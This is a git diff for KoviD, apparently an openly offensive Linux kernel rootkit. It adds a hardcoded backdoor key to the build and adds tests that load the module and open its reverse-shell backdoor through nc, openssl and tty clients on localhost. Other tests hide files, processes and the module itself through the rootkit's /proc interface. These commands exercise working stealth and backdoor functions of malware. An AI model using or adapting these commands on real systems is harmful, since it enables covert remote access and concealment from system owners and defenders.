diff --git a/Makefile b/Makefile index 606fd13..e2b9547 100644 --- a/Makefile +++ b/Makefile @@ -11,8 +11,15 @@ AS=$(shell which as) CTAGS=$(shell which ctags) JOURNALCTL := $(shell which journalctl) UUIDGEN := $(shell uuidgen) + +# For tests, use hardcoded keys. +ifndef TEST_ENV BDKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') UNHIDEKEY := 0x$(shell od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n') +else +BDKEY=0x7d3b1cb572f16425 +UNHIDEKEY=0x2 +endif # PROCNAME, /proc/ interface. COMPILER_OPTIONS := -Wall -DPROCNAME='"$(PROCNAME)"' \ diff --git a/docs/TestFeatures.md b/docs/TestFeatures.md index fc533eb..7aa48b8 100644 --- a/docs/TestFeatures.md +++ b/docs/TestFeatures.md @@ -39,7 +39,7 @@ $ cmake -DPROCNAME=myproc -DMODNAME=mymodule ../ If you want to build and run native tests only, just use: ``` -$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" +$ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 ``` ## Building for Linux version other than native @@ -109,9 +109,10 @@ $ make To simply run those (but make sure you followed the instructions for setting the enviroment described below): ``` + $ cd KoviD && make PROCNAME="myprocname" TEST_ENV=1 # From root directory of the project $ mkdir build && cd build - $ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" + $ cmake ../ -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 # Please run the command with only one Thread! $ make check-kovid -j1 ``` @@ -187,7 +188,7 @@ Usual set of commands to be used: $ git clone https://github.com/carloslack/KoviD.git main-KoviD && cd main-KoviD $ git submodule update --init test/test-artefacts $ mkdir build && cd build -$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" && make check-kovid +$ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCMAKE_C_COMPILER=gcc && make PROCNAME="myprocname" TEST_ENV=1 && make check-kovid ``` ## Insall dependecies and set up enviroment @@ -269,7 +270,7 @@ Run tests in `DEPLOY` mode (some tests are run in this mode only; this is exampl ``` $ cmake ../ -DKOVID_LINUX_VERSION=5.10 -DKERNEL_DIR=projects/private/kovid/linux -DKOVID_LINUX_VERSION=5.10 -DCROSS_TESTS=ON -DCMAKE_C_COMPILER=gcc -DDEPLOY=1 -$ make PROCNAME="myprocname" DEPLOY=1 +$ make PROCNAME="myprocname" DEPLOY=1 TEST_ENV=1 $ make check-kovid ``` @@ -306,3 +307,7 @@ NOTE: If a test should be executed in `DEPLOY` mode only, `.test` file should co | tty backdoor | Yes | native/tty-backdoor.test | | backdoor echo -s | Yes | native/nc-backdoor-echo-s.test | | Hide/Unhide Module | Yes | native/hide-unhide-module.test | +| backdoor + PID | Yes | native/nc-backdoor-plus-pid.test | +| hide file | Yes | native/hiden-file.test | +| hide file (2) | Yes | native/hiden-file-in-all-dirs.test | +| unhide module | Yes | native/hide-unhide-module.test | diff --git a/test/native/Inputs/Makefile b/test/native/Inputs/Makefile new file mode 100644 index 0000000..53ce8ac --- /dev/null +++ b/test/native/Inputs/Makefile @@ -0,0 +1,7 @@ +obj-m = hello.o + +all: + make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules + +clean: + make --C /lib/modules/$(shell uname -r)/build M=$(PWD) clean diff --git a/test/native/Inputs/hello.c b/test/native/Inputs/hello.c new file mode 100644 index 0000000..353c00a --- /dev/null +++ b/test/native/Inputs/hello.c @@ -0,0 +1,24 @@ +#include +#include +#include + +MODULE_LICENSE("GPL"); + +MODULE_DESCRIPTION("A simple Hello world LKM!"); + +MODULE_VERSION("0.1"); + +static int __init hello_start(void) +{ + printk(KERN_INFO "Loading hello module...\n"); + printk(KERN_INFO "Hello world\n"); + return 0; +} + +static void __exit hello_end(void) +{ + printk(KERN_INFO "Goodbye!!!\n"); +} + +module_init(hello_start); +module_exit(hello_end); diff --git a/test/native/Inputs/simple-test.c b/test/native/Inputs/simple-test.c new file mode 100644 index 0000000..f8528a7 --- /dev/null +++ b/test/native/Inputs/simple-test.c @@ -0,0 +1,6 @@ +int main() +{ + while(1); + + return 0; +} diff --git a/test/native/hide-unhide-module.test b/test/native/hide-unhide-module.test index 59ed72e..13ceff5 100644 --- a/test/native/hide-unhide-module.test +++ b/test/native/hide-unhide-module.test @@ -1,4 +1,3 @@ -# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS @@ -8,8 +7,10 @@ sleep 10 sudo insmod ../../../build/kovid.ko lsmod | grep kovid -echo -h > /proc/myprocname +kill -CONT 31337 +echo hide-lkm > /proc/myprocname lsmod | grep kovid +echo unhide-lkm=2 > /proc/myprocname sudo rmmod kovid # CHECK: kovid diff --git a/test/native/hiden-file-in-all-dirs.test b/test/native/hiden-file-in-all-dirs.test new file mode 100644 index 0000000..45a9d20 --- /dev/null +++ b/test/native/hiden-file-in-all-dirs.test @@ -0,0 +1,30 @@ +# REQUIRES: 0 +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo insmod ../../../build/kovid.ko +kill -CONT 31337 + +TEST_FILE="hidden_file.txt" + +# Create a file with the same name in another directory +OTHER_DIR="/tmp/other_dir" +mkdir -p "$OTHER_DIR" +touch "$OTHER_DIR/$TEST_FILE" + +# Hide the file using the backdoor +echo hide-file-anywhere="$TEST_FILE" > /proc/myprocname + +# Check that files with the same name in other directories are also hidden +ls "$OTHER_DIR" | grep "$TEST_FILE" || echo "File is hidden in other directory" + +# Cleanup +rm -rf "$OTHER_DIR" + +# Remove the kernel module +sudo rmmod kovid + +# CHECK: File is hidden in other directory diff --git a/test/native/hiden-file.test b/test/native/hiden-file.test new file mode 100644 index 0000000..aef8702 --- /dev/null +++ b/test/native/hiden-file.test @@ -0,0 +1,29 @@ +# REQUIRES: 0 +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo insmod ../../../build/kovid.ko +kill -CONT 31337 + +# Create a test directory and file +TEST_DIR="/tmp/test_hide_file" +TEST_FILE="hidden_file.txt" +mkdir -p "$TEST_DIR" +touch "$TEST_DIR/$TEST_FILE" + +# Hide the file using the backdoor +echo hide-file="$TEST_DIR/$TEST_FILE" > /proc/myprocname + +# Verify that the file is hidden when listing the directory +ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden" + +# Cleanup +rm -rf "$TEST_DIR" + +# Remove the kernel module +sudo rmmod kovid + +# CHECK: File is hidden diff --git a/test/native/nc-backdoor-echo-s.test b/test/native/nc-backdoor-echo-s.test index d983f4e..4e1035d 100644 --- a/test/native/nc-backdoor-echo-s.test +++ b/test/native/nc-backdoor-echo-s.test @@ -8,8 +8,8 @@ sudo dmesg -c sleep 10 sudo insmod ../../../build/kovid.ko -sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 -echo -s > /proc/myprocname +sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425 +echo list-hidden-tasks > /proc/myprocname sudo rmmod kovid sudo dmesg @@ -17,9 +17,9 @@ sudo dmesg # CHECK: Waiting for event # CHECK: loaded # CHECK: Got event -# CHECK: hide [{{.*}}] {{.*}} -# CHECK: hide [{{.*}}] {{.*}} -# CHECK: BD : dash -# CHECK: BD : bash +# CHECK: hide: {{.*}} +# CHECK: hide: {{.*}} +# CHECK: hide: {{.*}} +# CHECK: hide: {{.*}} # CHECK: Got event # CHECK: unloaded diff --git a/test/native/nc-backdoor-plus-pid.test b/test/native/nc-backdoor-plus-pid.test new file mode 100644 index 0000000..b02c5be --- /dev/null +++ b/test/native/nc-backdoor-plus-pid.test @@ -0,0 +1,36 @@ +# REQUIRES: 0 +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo insmod ../../../build/kovid.ko + +# Start the reverse shell in the background, suppressing its output +sudo timeout 20 ../../../scripts/bdclient.sh nc localhost 9999 > /dev/null 2>&1 & + +# Allow the reverse shell to initialize +sleep 1 + +# Send a signal to the "kill -CONT 31337" process as an additional check +kill -CONT 31337 || echo "sh: can't kill pid 31337: No such process" + +# Run the `a.out` executable in the background and capture its PID +./Inputs/a.out & +AOUT_PID=$! + +# Wait briefly to ensure the process has started +sleep 1 + +# Hide the process using the backdoor functionality +echo hide-task-backdoor=$AOUT_PID > /proc/myprocname + +# Attempt to kill the hidden process and verify that it fails +kill -9 "$AOUT_PID" || echo "sh: can't kill pid $AOUT_PID: No such process" + +# Remove the module +sudo rmmod kovid + +# CHECK: sh: can't kill pid 31337: No such process +# CHECK: sh: can't kill pid {{.*}}: No such process diff --git a/test/native/nc-backdoor.test b/test/native/nc-backdoor.test index 0f27278..be76639 100644 --- a/test/native/nc-backdoor.test +++ b/test/native/nc-backdoor.test @@ -1,3 +1,4 @@ +# REQUIRES: 0 # REQUIRES: DEBUG_ONLY # REQUIRES: NATIVE_TESTS @@ -7,7 +8,7 @@ sudo dmesg -c sleep 10 sudo insmod ../../../build/kovid.ko -sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 +sudo timeout 10 ../../../scripts/bdclient.sh nc localhost 9999 0x7d3b1cb572f16425 sudo rmmod kovid sudo dmesg diff --git a/test/native/openssl-backdoor.test b/test/native/openssl-backdoor.test index 5ab43bd..0ee75fd 100644 --- a/test/native/openssl-backdoor.test +++ b/test/native/openssl-backdoor.test @@ -6,7 +6,7 @@ # RUN: FileCheck-18 --input-file=%t.log %s sudo insmod ../../../build/kovid.ko -sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999 +sudo timeout 10 ../../../scripts/bdclient.sh openssl localhost 9999 0x7d3b1cb572f16425 sudo rmmod kovid # CHECK: ACCEPT diff --git a/test/native/simple-insmod-hello-ko.test b/test/native/simple-insmod-hello-ko.test new file mode 100644 index 0000000..b3a6c22 --- /dev/null +++ b/test/native/simple-insmod-hello-ko.test @@ -0,0 +1,18 @@ +# REQUIRES: 0 +# REQUIRES: DEBUG_ONLY +# REQUIRES: NATIVE_TESTS + +## Make sure you enter `test/native/Inputs` and run `make` +## in order to build `hello.ko`. + +# RUN: bash %s > %t.log +# RUN: FileCheck-18 --input-file=%t.log %s + +sudo dmesg -c +sleep 2 +sudo insmod ../../../test/native/Inputs/hello.ko +sudo rmmod hello +sudo dmesg + +# CHECK: Loading hello module... +# CHECK: Hello world diff --git a/test/native/tty-backdoor.test b/test/native/tty-backdoor.test index b404346..a884619 100644 --- a/test/native/tty-backdoor.test +++ b/test/native/tty-backdoor.test @@ -8,7 +8,7 @@ sudo dmesg -c sleep 20 sudo insmod ../../../build/kovid.ko -sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999 +sudo timeout 10 ../../../scripts/bdclient.sh tty localhost 9999 0x7d3b1cb572f16425 sudo rmmod kovid sudo dmesg